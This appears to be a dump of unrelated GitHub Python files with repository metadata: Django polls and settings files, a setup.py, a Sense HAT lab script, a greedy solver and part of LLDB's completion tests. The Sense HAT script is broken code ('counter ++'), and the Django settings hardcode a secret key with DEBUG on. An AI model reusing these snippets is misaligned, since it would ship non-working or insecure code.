return model
|
[
"mahedi0803061@gmail.com"
] |
mahedi0803061@gmail.com
|
beed92594803d776a2364c3b3f53324fd5b2ace0
|
2d6940c2560d89f2fc9bf2015c502ad0f1946824
|
/Class_Python.py
|
5be935c66354d4f43af8c77ac38c4d164dc59259
|
[] |
no_license
|
101guptaji/Python-programmes
|
40b12de60d75f31254ec9a52580142a17ea3f214
|
81a5d8ea8ce498e4e1f2884818a0e39762832fa2
|
refs/heads/main
| 2023-04-02T06:42:39.177640
| 2021-03-23T18:01:02
| 2021-03-23T18:01:02
| 350,808,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
class Apple:
def __init__(self, color, flavor):
self.color = color
self.flavor = flavor
def __str__(self):
return "This apple is {} and its flavor is {}".format(self.color, self.flavor)
myapple=Apple("red", "sweet")
myapple.color="blue"
print(myapple)
|
[
"noreply@github.com"
] |
noreply@github.com
|
9bc0203a5ad7b9018aa6800ff71449d5b924bcca
|
d34f3c73c4ed804f48fbed476f22013e5d951daa
|
/web/django_poll/polls/urls.py
|
ad26bb531c0dfb24ffe05ff50e2e6a77acc9fa63
|
[] |
no_license
|
brxue/sandbox
|
7ad7ea76130f0edc2ff9fc62c192131fce1242d1
|
a9cc9edd9e2233b1b90c822edd43c3c480385c58
|
refs/heads/master
| 2021-06-18T17:14:18.698560
| 2017-06-19T15:25:53
| 2017-06-19T15:25:53
| 13,215,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 460
|
py
|
from django.conf.urls import patterns, url
from polls import views
urlpatterns = patterns('',
# example: /polls/
url(r'^$', views.index, name='index'),
# example: /polls/5/
url(r'^(?P<question_id>\d+)/$', views.detail, name='detail'),
# example: /polls/5/results/
url(r'^(?P<question_id>\d+)/results/$', views.results, name='results'),
# example: /polls/5/vote/
url(r'^(?P<question_id>\d+)/vote/$', views.vote, name='vote'),
)
|
[
"brxue@outlook.com"
] |
brxue@outlook.com
|
bf77986a8e164ee56fb39537757225beeb6c2aff
|
ad8de5acb466940c53c92fdd08f3003581e76f56
|
/BookStore/admin/models.py
|
9cb346042f295eae21bfc9c2ed130bc7a37d6f1b
|
[
"Apache-2.0"
] |
permissive
|
peter-dinh/Bookstore
|
0343e3be9aff079589c728f6e97fa53e27b16a7c
|
b46b2d6a74f7182128f37ad86afc594ef888a153
|
refs/heads/master
| 2022-12-11T16:03:47.745078
| 2019-01-14T18:19:36
| 2019-01-14T18:19:36
| 162,212,257
| 0
| 0
|
Apache-2.0
| 2022-12-08T01:30:12
| 2018-12-18T01:26:36
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 313
|
py
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Account(User):
display_name = models.CharField(max_length=200)
phone = models.CharField(max_length=10)
address = models.CharField(max_length=200)
is_admin = models.BooleanField(default=False)
|
[
"dinhtruong018@gmail.com"
] |
dinhtruong018@gmail.com
|
c2f4971c5d784ab25b2d6261a4fdee728004dbae
|
92a69414a998830520d8b3de2eb708f61e472249
|
/venv/Scripts/pip-script.py
|
d6835ac03f979f48e608277442cd85665aa3fe10
|
[] |
no_license
|
DiegoMeruoca/Python5-Funcoes
|
cb8e78e8312f0c0d9dc0534d1cdfe5cf50c6bf82
|
b5f3def59daa2d5bbf4139eb2670be9214af6409
|
refs/heads/master
| 2021-01-26T10:55:07.963072
| 2020-02-27T02:30:48
| 2020-02-27T02:30:48
| 243,412,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
#!D:\ETEC\DS1\Exemplos\Funcoes\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
|
[
"diegomeruoca@gmail.com"
] |
diegomeruoca@gmail.com
|
24b2aea0aa16cdbdddcd6e00440f47ffd682e8d4
|
ddb48f204fefb1886818d8f337e64b608a874f78
|
/mymodule.py
|
4bb8392762ed4a6703e01012adc7cba9421d76ba
|
[] |
no_license
|
AlexandrKarpov712/Projects
|
71edb63b6a3bafdbf20e4ce274ecbbee89f5f74d
|
057c3f78245b3fcf2edb4155067692a8b11b4b49
|
refs/heads/main
| 2023-03-26T01:49:20.622688
| 2021-03-28T20:06:27
| 2021-03-28T20:06:27
| 345,642,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,617
|
py
|
"""Module for the most frequently used operations in homeworks.
Classes: TreeNode
Functions: text(g), write_to_file(data, filename="./text.txt"),
read_from_file(filename="./text.txt"),
choose_task(step, func1, func2), __init__(self, value),
choose_task_3(step, func1, func2, func3)
"""
def text(g):
"""Entering data from the keyboard"""
text = input(g)
return text
def write_to_file(data, filename="./text.txt"):
"""Writing data to a file"""
with open(filename, "wb") as f:
f.write(data)
def read_from_file(filename="./text.txt"):
"""Reading data from a file"""
with open(filename, "rb") as f:
data = f.read()
return data
def choose_task(step, func1, func2):
"""Task selection"""
if step == "1":
func1()
elif step == "2":
func2()
else:
print("Повторите ввод...")
def choose_task_3(step, func1, func2, func3):
"""Task selection"""
if step == "1":
func1()
elif step == "2":
func2()
elif step == "3":
func3()
else:
print("Повторите ввод...")
class TreeNode:
"""TreeNode class is used to hold Tree object data.
Methods:
__init__(self, value)
pre_order(node)
"""
def __init__(self, value):
"""Tree Class constructor to initialize the object.
.
Input arguments: value - the value to be stored in the node.
"""
self.value = value
self.left = None
self.right = None
|
[
"noreply@github.com"
] |
noreply@github.com
|
51655665cb92a20e135645e272c7062cdcbd2bed
|
cf2fa0441e83e246c406afacd153b060069da757
|
/setup.py
|
842336cf8a796d8bd5d3270b0496cc9c20739777
|
[] |
no_license
|
NSO-developer/ncs_pycli
|
c41b7d586bc4ba5fd24f9cdfb95dd9324be9360e
|
1a2415136c3f2d2495d7f28b06a2a36831592a67
|
refs/heads/master
| 2022-09-04T06:12:02.889927
| 2022-08-08T05:31:13
| 2022-08-08T05:31:13
| 137,266,751
| 21
| 6
| null | 2022-08-08T05:31:14
| 2018-06-13T20:25:20
|
Python
|
UTF-8
|
Python
| false
| false
| 1,662
|
py
|
from setuptools import setup, find_packages
from os import path
from io import open
here = path.abspath(path.dirname(__file__))
reqs = []
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
with open(path.join(here, '.version'), encoding='utf-8') as f:
version = f.read()
with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:
read_lines = f.readlines()
reqs = [each.strip() for each in read_lines]
setup(
name = 'ncs_pycli',
version = version,
description = "Gives you an interactive NSO python shell with tab completion.",
long_description = long_description,
long_description_content_type = 'text/markdown',
url = 'https://github.com/NSO-developer/ncs_pycli.git',
author = 'Hakan Niska, Kiran Kumar Kotari',
author_email = 'hniska@cisco.com, kkotari@cisco.com',
entry_points={
'console_scripts': [
'ncs_pycli=ncs_pycli.ncs_pycli:run',
'ncs-pycli=ncs_pycli.ncs_pycli:run',
],
},
install_requires=reqs,
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
keywords = 'ncs-pycli ncs_pycli',
packages = find_packages(where='.', exclude=['tests']),
include_package_data=True,
)
|
[
"kirankotari@live.com"
] |
kirankotari@live.com
|
be25ea7ab890f57eea2e7098823dc03d47143732
|
473ecdb25e6b877cacc66028b9834f1cef7b4ffa
|
/C_extractor.py
|
6b3ee513f489ac53d579239b23812f6ffefc5e34
|
[] |
no_license
|
Charlie-Toro/automate-Python
|
0affa1b173eb0025572c60bb2bd1be97b6267c4d
|
373621b21ac16ab88a4fd149e46789527c54613c
|
refs/heads/master
| 2021-01-23T10:44:32.788218
| 2017-06-05T01:40:37
| 2017-06-05T01:40:37
| 93,088,842
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
# Contact Extractor
# Caleb Bell
# Extracts phone number and email address from text
import re,pyperclip
class Extractor:
"""uses regular expressions to extract data from clipboard"""
def __init__(self):
def email_extract(text):
phone_regex = re.compile(r'\d{3}-\d{3}-\d{4}')
|
[
"charles_toro@mail.com"
] |
charles_toro@mail.com
|
a74af5013611c1d1945d2e4250a4c532a725e0bd
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_6404600001200128_0/Python/kawasaki/solve.py
|
13028d9808e7f822dbd94054186f11d1384f2212
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 371
|
py
|
T = int(raw_input())
for test_index in xrange(T):
N = int(raw_input())
m = map(int, raw_input().split())
y = 0
for i in xrange(N - 1):
y += max(m[i] - m[i + 1], 0)
d = max(max(m[i] - m[i + 1], 0) for i in xrange(N - 1))
z = 0
for i in xrange(N - 1):
z += min(d, m[i])
print 'Case #{}: {} {}'.format(test_index + 1, y, z)
|
[
"eewestman@gmail.com"
] |
eewestman@gmail.com
|
7cb9bdbdeb9ae40bcb7cd2e41b2b4ef986fe95bb
|
2cfe7df2684bae48175bc5fcdf9a56bc0f07f27f
|
/dm/tags/models.py
|
89033b9a2f01152d593e75a1f0ea9ee606e44414
|
[] |
no_license
|
naveen0492/digital
|
b1bedc6fb99c54eddd681bc9a24dc134374310ad
|
5eefb59314de3b8d6f5d5ea791d10826170e8f87
|
refs/heads/master
| 2021-01-01T07:40:38.746977
| 2017-08-07T20:48:53
| 2017-08-07T20:48:53
| 97,566,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,492
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.db.models.signals import pre_save, post_save
from django.core.urlresolvers import reverse
from django.utils.text import slugify
# Create your models here.
from products.models import Product
class TagQuerySet(models.query.QuerySet):
def active(self):
return self.filter(active=True)
class TagManager(models.Manager):
def get_queryset(self):
return TagQuerySet(self.model, using=self._db)
def all(self, *args, **kwargs):
return super(TagManager, self).all(*args, **kwargs).active()
class Tag(models.Model):
title = models.CharField(max_length=120, unique=True)
slug = models.SlugField(unique=True)
products = models.ManyToManyField(Product, blank=True)
active = models.BooleanField(default=True)
objects = TagManager()
def __unicode__(self):
return str(self.title)
def get_absolute_url(self):
view_name = "tags:detail"
return reverse(view_name, kwargs={"slug": self.slug})
def create_slug(instance, new_slug=None):
slug = slugify(instance.title)
if new_slug is not None:
slug = new_slug
qs = Product.objects.filter(slug=slug)
exists = qs.exists()
if exists:
new_slug = "%s-%s" %(slug, qs.first().id)
return create_slug(instance, new_slug=new_slug)
return slug
def tag_pre_save_reciever(sender, instance, *args, **kwargs):
if not instance.slug:
instance.slug = create_slug(instance)
pre_save.connect(tag_pre_save_reciever, sender=Tag)
|
[
"naveen0492"
] |
naveen0492
|
e6ae49348338fd374b8ee8d340fdec8e4ded1ca5
|
76655119513727111fa16890640a46ec143f3290
|
/Lab-4/lab4.py
|
58fcd8952c64803676011d63ab109c2567193084
|
[] |
no_license
|
HovishBalgobin/SYSC3010_Hovish_Balgobin
|
6daac4edc0d291fb20fb5d65af8917302c417282
|
4bb2305fdbaebb59b3a498082861bac0d0bda757
|
refs/heads/master
| 2022-12-26T21:02:48.841069
| 2020-10-09T19:08:05
| 2020-10-09T19:08:05
| 295,850,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,219
|
py
|
from sense_hat import SenseHat
from time import sleep
counter = 0
sense = SenseHat()
## creating a variable to make use of the SenseHat in-built functions
sense.clear()
## clearing the display
purple = (148,0,211)
##creating purple using the RGB values
def show_H():
sense.show_letter("H",back_colour= purple)
#time.sleep(.5)
##function to display H whenever it is called with a purple background.
def show_B():
sense.show_letter("B", back_colour = purple)
#time.sleep(.5)
##function to display B whenever it is called with a purple background.
def repeat(flag):
if (flag==True):
show_H()
elif(flag==False):
show_B()
#flag = True
flag=not(flag)
return flag
## function used to display the letters and toggle the flag.
selection = False #initialising selection and Flag
Flag= True;
while True:
events = sense.stick.get_events()
for event in events:
# Skip releases
if event.action != "released":
Flag = repeat(Flag)
if (sense.stick.get_events()=='up'):
counter ++
if (sense.stick.get_events()=='down'):
counter --
selection = True
sense.clear()
|
[
"hovishbalgobin@cmail.carleton.ca"
] |
hovishbalgobin@cmail.carleton.ca
|
635432b0aa0919407d0eb764a68554525275005c
|
fb1e23ceaccb3d4b5b648bdc8b6996ad17e46b38
|
/murr/settings.py
|
af9ec47dc3d9835d5ca1ff3537ba312861af195f
|
[] |
no_license
|
100ika/murr
|
91e7fb6c39ab505a5f883995db0195ac34f1b047
|
cc60b95fdac9416a2ce3d00ec2589ae1a99444d9
|
refs/heads/master
| 2021-09-23T12:23:11.952888
| 2020-02-04T17:41:48
| 2020-02-04T17:41:48
| 238,261,720
| 0
| 0
| null | 2021-09-22T18:30:27
| 2020-02-04T17:15:42
|
Python
|
UTF-8
|
Python
| false
| false
| 3,082
|
py
|
"""
Django settings for murr project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')fd3!7q(zmj^^-pyo349vr(#0=kpvlih#1ow9-7*+gmbji!6s*'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'murr.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'murr.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"59304702+100ika@users.noreply.github.com"
] |
59304702+100ika@users.noreply.github.com
|
7421d257613858f51cd4d9f3382df003b0be3f51
|
e7ea4919d8663b0c69c57106be2d1e2c0d1aecb6
|
/greedy_20.py
|
5e7732f22d3a30b7451c097dd5b3689c541cd0a3
|
[] |
no_license
|
johnrso/new_170_proj
|
74ad6a0b6be53583e1b284bed57365ecc6798483
|
d73676947e8059c9f6d5129e474f698b8f21ced2
|
refs/heads/main
| 2023-01-22T07:05:10.798575
| 2020-12-07T00:20:11
| 2020-12-07T00:20:11
| 319,007,434
| 0
| 1
| null | 2020-12-06T11:11:49
| 2020-12-06T10:35:42
|
Python
|
UTF-8
|
Python
| false
| false
| 3,800
|
py
|
import sys
import os
import getopt
import glob
import math
import timeit
import random
import multiprocessing as mp
from utils import *
from parse import *
from os.path import *
ITERATIONS = 10 ** 5
def greedy_solve_20(G, s):
curr = {}
rooms = {}
best_happiness = 0
for i in range(20):
curr[i] = 0
if is_valid_solution(curr, G, s, 1):
return (curr, 1)
# G_copy = G.copy()
# for e in list(G_copy.edges.data()):
# if e[2]['stress'] > s / 2:
# G_copy.remove_edge(*e[:2])
edgelist = list(G.edges.data())
edgelist.sort(key = lambda x: -x[2]['happiness'])
edgelist.sort(key = lambda x: x[2]['stress'])
for i in range(20):
curr[i] = i
rooms[i] = [i]
best = (dict(curr), 20)
# print("creating prior...")
for e in edgelist:
if e[2]['stress'] > s / 5:
break
# print(e)
# print(rooms)
# print(curr)
st1, st2, _ = e
st1_num, st2_num = curr[st1], curr[st2]
st1_room, st2_room = rooms[st1_num], rooms[st2_num]
combined = st1_room + st2_room
swap_into_st1_1 = st1_room + [st2]
swap_into_st1_2 = st2_room[:]
swap_into_st2_1 = st1_room[:]
swap_into_st2_2 = st2_room + [st1]
swap_into_st1_2.remove(st2)
swap_into_st2_1.remove(st1)
curr_happ = calculate_happiness_for_room(st1_room, G) + calculate_happiness_for_room(st2_room, G)
comb_happ = calculate_happiness_for_room(combined, G)
s_st1_happ = calculate_happiness_for_room(swap_into_st1_1, G) + calculate_happiness_for_room(swap_into_st1_2, G)
s_st2_happ = calculate_happiness_for_room(swap_into_st2_1, G) + calculate_happiness_for_room(swap_into_st2_2, G)
if comb_happ >= max([curr_happ, s_st1_happ, s_st2_happ]):
for st in st2_room:
curr[st] = st1_num
rooms[st1_num] = combined
rooms[st2_num] = []
elif s_st1_happ >= max([curr_happ, comb_happ, s_st2_happ]):
curr[st2] = st1_num
rooms[st1_num] += [st2]
st2_room.remove(st2)
elif s_st2_happ >= max([curr_happ, comb_happ, s_st1_happ]):
curr[st1] = st2_num
rooms[st2_num] += [st1]
st1_room.remove(st1)
rooms = reorder_rooms(rooms)
curr = convert_dictionary(rooms)
num_rooms = max(curr.values()) + 1
if is_valid_solution(curr, G, s, num_rooms):
happ = calculate_happiness(curr, G)
if happ > best_happiness:
best_happiness = happ
best = (dict(curr), num_rooms)
print(best)
return best
def reorder_rooms(rooms):
ret = {}
count = 0
for room in rooms.values():
if room:
ret[count] = room
count += 1
return ret
# if __name__ == '__main__':
# assert len(sys.argv) == 2
# path = sys.argv[1]
# G, s = read_input_file(path)
# # read_output_file("out/test.out", G, s)
# D, k = greedy_solve_20(G, s)
# G, s = read_input_file(path)
# assert is_valid_solution(D, G, s, k)
# print("Total Happiness: {}".format(calculate_happiness(D, G)))
# write_output_file(D, 'out/test.out')
if __name__ == '__main__':
inputs = glob.glob('./all_inputs/medium-*')
ttl = len(inputs)
ct = 0
for input_path in inputs:
if ct % 50 == 0:
print("{} out of {}".format(ct, ttl))
output_path = './all_outputs/' + basename(normpath(input_path))[:-3] + '.out'
G, s = read_input_file(input_path, 20)
D, k = greedy_solve_20(G, s)
G, s = read_input_file(input_path, 20)
assert is_valid_solution(D, G, s, k)
write_output_file(D, output_path)
ct += 1
|
[
""
] | |
6b97a43edfe028b659923528eaadd406c208290f
|
71501709864eff17c873abbb97ffabbeba4cb5e3
|
/llvm13.0.0/lldb/test/API/functionalities/completion/TestCompletion.py
|
11f0e387245e0fc659032f8b1323c5e4f7f230db
|
[
"NCSA",
"Apache-2.0",
"LLVM-exception"
] |
permissive
|
LEA0317/LLVM-VideoCore4
|
d08ba6e6f26f7893709d3285bdbd67442b3e1651
|
7ae2304339760685e8b5556aacc7e9eee91de05c
|
refs/heads/master
| 2022-06-22T15:15:52.112867
| 2022-06-09T08:45:24
| 2022-06-09T08:45:24
| 189,765,789
| 1
| 0
|
NOASSERTION
| 2019-06-01T18:31:29
| 2019-06-01T18:31:29
| null |
UTF-8
|
Python
| false
| false
| 33,655
|
py
|
"""
Test the lldb command line completion mechanism.
"""
import os
from multiprocessing import Process
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbplatform
from lldbsuite.test import lldbutil
class CommandLineCompletionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
NO_DEBUG_INFO_TESTCASE = True
@classmethod
def classCleanup(cls):
"""Cleanup the test byproducts."""
try:
os.remove("child_send.txt")
os.remove("child_read.txt")
except:
pass
def test_at(self):
"""Test that 'at' completes to 'attach '."""
self.complete_from_to('at', 'attach ')
def test_de(self):
"""Test that 'de' completes to 'detach '."""
self.complete_from_to('de', 'detach ')
def test_frame_variable(self):
self.build()
self.main_source = "main.cpp"
self.main_source_spec = lldb.SBFileSpec(self.main_source)
(target, process, thread, bkpt) = lldbutil.run_to_source_breakpoint(self,
'// Break here', self.main_source_spec)
self.assertEquals(process.GetState(), lldb.eStateStopped)
# Since CommandInterpreter has been corrected to update the current execution
# context at the beginning of HandleCompletion, we're here explicitly testing
# the scenario where "frame var" is completed without any preceding commands.
self.complete_from_to('frame variable fo',
'frame variable fooo')
self.complete_from_to('frame variable fooo.',
'frame variable fooo.')
self.complete_from_to('frame variable fooo.dd',
'frame variable fooo.dd')
self.complete_from_to('frame variable ptr_fooo->',
'frame variable ptr_fooo->')
self.complete_from_to('frame variable ptr_fooo->dd',
'frame variable ptr_fooo->dd')
self.complete_from_to('frame variable cont',
'frame variable container')
self.complete_from_to('frame variable container.',
'frame variable container.MemberVar')
self.complete_from_to('frame variable container.Mem',
'frame variable container.MemberVar')
self.complete_from_to('frame variable ptr_cont',
'frame variable ptr_container')
self.complete_from_to('frame variable ptr_container->',
'frame variable ptr_container->MemberVar')
self.complete_from_to('frame variable ptr_container->Mem',
'frame variable ptr_container->MemberVar')
def test_process_attach_dash_dash_con(self):
"""Test that 'process attach --con' completes to 'process attach --continue '."""
self.complete_from_to(
'process attach --con',
'process attach --continue ')
def test_process_launch_arch(self):
self.complete_from_to('process launch --arch ',
['mips',
'arm64'])
def test_process_load(self):
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
self.complete_from_to('process load Makef', 'process load Makefile')
@skipUnlessPlatform(["linux"])
def test_process_unload(self):
"""Test the completion for "process unload <index>" """
# This tab completion should not work without a running process.
self.complete_from_to('process unload ',
'process unload ')
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
err = lldb.SBError()
self.process().LoadImage(lldb.SBFileSpec(self.getBuildArtifact("libshared.so")), err)
self.assertSuccess(err)
self.complete_from_to('process unload ',
'process unload 0')
self.process().UnloadImage(0)
self.complete_from_to('process unload ',
'process unload ')
def test_process_plugin_completion(self):
subcommands = ['attach -P', 'connect -p', 'launch -p']
for subcommand in subcommands:
self.complete_from_to('process ' + subcommand + ' mac',
'process ' + subcommand + ' mach-o-core')
def completions_contain_str(self, input, needle):
interp = self.dbg.GetCommandInterpreter()
match_strings = lldb.SBStringList()
num_matches = interp.HandleCompletion(input, len(input), 0, -1, match_strings)
found_needle = False
for match in match_strings:
if needle in match:
found_needle = True
break
self.assertTrue(found_needle, "Returned completions: " + "\n".join(match_strings))
@skipIfRemote
@skipIfReproducer
def test_common_completion_process_pid_and_name(self):
# The LLDB process itself and the process already attached to are both
# ignored by the process discovery mechanism, thus we need a process known
# to us here.
self.build()
server = self.spawnSubprocess(
self.getBuildArtifact("a.out"),
["-x"], # Arg "-x" makes the subprocess wait for input thus it won't be terminated too early
install_remote=False)
self.assertIsNotNone(server)
pid = server.pid
self.completions_contain('process attach -p ', [str(pid)])
self.completions_contain('platform process attach -p ', [str(pid)])
self.completions_contain('platform process info ', [str(pid)])
self.completions_contain_str('process attach -n ', "a.out")
self.completions_contain_str('platform process attach -n ', "a.out")
def test_process_signal(self):
# The tab completion for "process signal" won't work without a running process.
self.complete_from_to('process signal ',
'process signal ')
# Test with a running process.
self.build()
self.main_source = "main.cpp"
self.main_source_spec = lldb.SBFileSpec(self.main_source)
lldbutil.run_to_source_breakpoint(self, '// Break here', self.main_source_spec)
self.complete_from_to('process signal ',
'process signal SIG')
self.complete_from_to('process signal SIGPIP',
'process signal SIGPIPE')
self.complete_from_to('process signal SIGA',
['SIGABRT',
'SIGALRM'])
def test_ambiguous_long_opt(self):
self.completions_match('breakpoint modify --th',
['--thread-id',
'--thread-index',
'--thread-name'])
def test_disassemble_dash_f(self):
self.completions_match('disassemble -F ',
['default',
'intel',
'att'])
def test_plugin_load(self):
self.complete_from_to('plugin load ', [])
def test_log_enable(self):
self.complete_from_to('log enable ll', ['lldb'])
self.complete_from_to('log enable dw', ['dwarf'])
self.complete_from_to('log enable lldb al', ['all'])
self.complete_from_to('log enable lldb sym', ['symbol'])
def test_log_enable(self):
self.complete_from_to('log disable ll', ['lldb'])
self.complete_from_to('log disable dw', ['dwarf'])
self.complete_from_to('log disable lldb al', ['all'])
self.complete_from_to('log disable lldb sym', ['symbol'])
def test_log_list(self):
self.complete_from_to('log list ll', ['lldb'])
self.complete_from_to('log list dw', ['dwarf'])
self.complete_from_to('log list ll', ['lldb'])
self.complete_from_to('log list lldb dwa', ['dwarf'])
def test_quoted_command(self):
self.complete_from_to('"set',
['"settings" '])
def test_quoted_arg_with_quoted_command(self):
self.complete_from_to('"settings" "repl',
['"replace" '])
def test_quoted_arg_without_quoted_command(self):
self.complete_from_to('settings "repl',
['"replace" '])
def test_single_quote_command(self):
self.complete_from_to("'set",
["'settings' "])
def test_terminated_quote_command(self):
# This should not crash, but we don't get any
# reasonable completions from this.
self.complete_from_to("'settings'", [])
def test_process_launch_arch_arm(self):
self.complete_from_to('process launch --arch arm',
['arm64'])
def test_target_symbols_add_shlib(self):
# Doesn't seem to work, but at least it shouldn't crash.
self.complete_from_to('target symbols add --shlib ', [])
def test_log_file(self):
# Complete in our source directory which contains a 'main.cpp' file.
src_dir = os.path.dirname(os.path.realpath(__file__)) + '/'
self.complete_from_to('log enable lldb expr -f ' + src_dir,
['main.cpp'])
def test_log_dir(self):
# Complete our source directory.
src_dir = os.path.dirname(os.path.realpath(__file__))
self.complete_from_to('log enable lldb expr -f ' + src_dir,
[src_dir + os.sep], turn_off_re_match=True)
# <rdar://problem/11052829>
def test_infinite_loop_while_completing(self):
"""Test that 'process print hello\' completes to itself and does not infinite loop."""
self.complete_from_to('process print hello\\', 'process print hello\\',
turn_off_re_match=True)
def test_watchpoint_co(self):
"""Test that 'watchpoint co' completes to 'watchpoint command '."""
self.complete_from_to('watchpoint co', 'watchpoint command ')
def test_watchpoint_command_space(self):
"""Test that 'watchpoint command ' completes to ['add', 'delete', 'list']."""
self.complete_from_to(
'watchpoint command ', [
'add', 'delete', 'list'])
def test_watchpoint_command_a(self):
"""Test that 'watchpoint command a' completes to 'watchpoint command add '."""
self.complete_from_to(
'watchpoint command a',
'watchpoint command add ')
def test_watchpoint_set_ex(self):
"""Test that 'watchpoint set ex' completes to 'watchpoint set expression '."""
self.complete_from_to(
'watchpoint set ex',
'watchpoint set expression ')
def test_watchpoint_set_var(self):
"""Test that 'watchpoint set var' completes to 'watchpoint set variable '."""
self.complete_from_to('watchpoint set var', 'watchpoint set variable ')
def test_watchpoint_set_variable_foo(self):
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
self.complete_from_to('watchpoint set variable fo', 'watchpoint set variable fooo')
# Only complete the first argument.
self.complete_from_to('watchpoint set variable fooo ', 'watchpoint set variable fooo ')
def test_help_fi(self):
"""Test that 'help fi' completes to ['file', 'finish']."""
self.complete_from_to(
'help fi', [
'file', 'finish'])
def test_help_watchpoint_s(self):
"""Test that 'help watchpoint s' completes to 'help watchpoint set '."""
self.complete_from_to('help watchpoint s', 'help watchpoint set ')
@expectedFailureNetBSD
def test_common_complete_watchpoint_ids(self):
subcommands = ['enable', 'disable', 'delete', 'modify', 'ignore']
# Completion should not work without a target.
for subcommand in subcommands:
self.complete_from_to('watchpoint ' + subcommand + ' ',
'watchpoint ' + subcommand + ' ')
# Create a process to provide a target and enable watchpoint setting.
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
self.runCmd('watchpoint set variable ptr_fooo')
for subcommand in subcommands:
self.complete_from_to('watchpoint ' + subcommand + ' ', ['1'])
def test_settings_append_target_er(self):
"""Test that 'settings append target.er' completes to 'settings append target.error-path'."""
self.complete_from_to(
'settings append target.er',
'settings append target.error-path')
def test_settings_insert_after_target_en(self):
"""Test that 'settings insert-after target.env' completes to 'settings insert-after target.env-vars'."""
self.complete_from_to(
'settings insert-after target.env',
'settings insert-after target.env-vars')
def test_settings_insert_before_target_en(self):
"""Test that 'settings insert-before target.env' completes to 'settings insert-before target.env-vars'."""
self.complete_from_to(
'settings insert-before target.env',
'settings insert-before target.env-vars')
def test_settings_replace_target_ru(self):
